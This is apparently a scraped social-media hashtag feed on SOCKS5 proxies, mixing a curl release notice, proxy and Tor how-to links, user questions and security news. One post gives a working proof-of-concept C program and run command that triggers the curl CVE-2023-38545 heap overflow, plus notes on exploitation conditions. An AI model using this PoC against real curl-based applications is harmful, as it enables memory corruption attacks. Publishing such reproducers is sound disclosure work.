#curl 8.13.0 has been released (#libcurl / #Haxx / #DICT / #FILE / #FTP / #FTPS / #Gopher / #HTTP / #HTTPS / #IMAP / #IMAPS / #LDAP / #LDAPS / #MQTT / #POP3 / #POP3S / #RTMP / #RTMPS / #RTSP / #SCP / #SFTP / #SMB / #SMBS / #SMTP / #SMTPS / #Telnet / #TFTP / #WebSocket / #SOCKS4 / #SOCKS5 / #SCRAM / #TLS / #HTTP2 / #HTTP3) https://curl.se/

TIL Network protocols Sans I/O

“… network protocol implementations written in Python that perform no I/O (this means libraries that operate directly on text or bytes; this excludes libraries that just abstract out I/O).”

Read the reference page
https://sans-io.readthedocs.io/

Хуйлуша #socks5 глушит?
Кто знает?
Сейчас попробовал, туба вроде работает

Besteht Interesse an einer Kurzanleitung, wie ein Browser den SOCKS5-Proxy von Mullvad nutzen kann, ohne dass der gesamte Traffic (also jede Anwendung) über das VPN getunnelt wird? Ziel ist: Nur den Browser über VPN tunneln, den Rest nicht.

#curl #SOCKS5 #heap buffer #overflow CVE-2023-38545

https://curl.se/docs/CVE-2023-38545.html

Here’s a quick proof of concept to reproduce the #curl #CVE202338545 #heapoverflow #vulnerability. This PoC expects localhost to run a #socks5 proxy:

gcc -xc -fsanitize=address - -lcurl <<EOF
# include <curl/curl.h>
# include <string.h>
int main(void)
{
CURL *curl = curl_easy_init();
if(curl) {
char url[32768];
memcpy(url, "https://", 8);
memset(url + 8, 'A', sizeof(url) - 8 - 1);
url[sizeof(url) - 1] = '\0';
curl_easy_setopt(curl, CURLOPT_URL, url);
(void)curl_easy_perform(curl);
curl_easy_cleanup(curl);
}
return 0;
}
EOF
https_proxy=socks5h://127.0.0.1 ./a.out

Some comments:
• Application must use socks5h proxy to be vulnerable (it can be via proxy env variables or by explicitly settings the proxy options inside the app).
• Application must either fetch the attacker provided URL or follow redirects controlled by the attacker.
• Exploitation is made slightly more complicated due to this being a heap buffer overflow (many libc have built-in heap sanity checks). On modern systems with address space layout randomization (ASLR) an additional information leak is likely required for successful exploitation.
• Certain combinations of libcurl, platform and/or application options are not affected. See the advisory at https://curl.se/docs/CVE-2023-38545.html for more details.

#Mozilla I am trying to redirect #Firefox traffic over an #SSH tunnel but there are #issue with javascript. It looks like all these file #js #jsm and their requests do not pass through the proxy.

Thus pages won't load, button's work, and in the worst case the pages simply crash.

How can I make these #javascript stuff working properly over #socks5?

Thanks!

#Linux and #javascript is a #bad #technology

#Mozilla I am trying to redirect #Firefox traffic over an #SSH tunnel but there are #issue with javascript. It looks like all these file #js #jsm and their requests do not pass through the proxy.

Thus pages won't load, button's work, and in the worst case the pages simply crash.

How can I make these #javascript stuff working properly over #socks5?

Thanks!

#Linux and #javascript is a #bad #technology

Malware turns home routers into proxies for Chinese state-sponsored hackers - Enlarge (credit: Getty Images)

Researchers on Tuesday unveiled... - https://arstechnica.com/?p=1939749 #homerouters #proxies #tp-link #biz⁢ #socks5

Firefox Multi-Account Containers with Tor and SSH Proxies

https://tilvids.com/videos/watch/fd594998-00af-4360-b97b-e3bdf1d0cace

Howto: Anonymous On Tor With Proxychains

#Tutorial #OSINT #Proxychains #Privacy #HumanRights #Socks5 #Anonymous #Tips #Howto #Infosec #Tor #CybersecurityAwarenessMonth

https://tube.tchncs.de/w/jUqBNUFqwjtveKMAHnSV5E